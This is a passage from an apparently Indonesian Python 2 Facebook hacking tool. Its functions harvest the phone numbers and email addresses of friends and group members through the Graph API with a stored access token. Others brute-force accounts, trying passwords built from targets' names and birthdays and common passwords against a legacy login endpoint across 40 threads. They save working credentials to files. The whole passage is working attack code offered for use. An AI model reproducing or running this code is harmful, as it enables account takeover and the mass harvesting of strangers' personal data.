raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
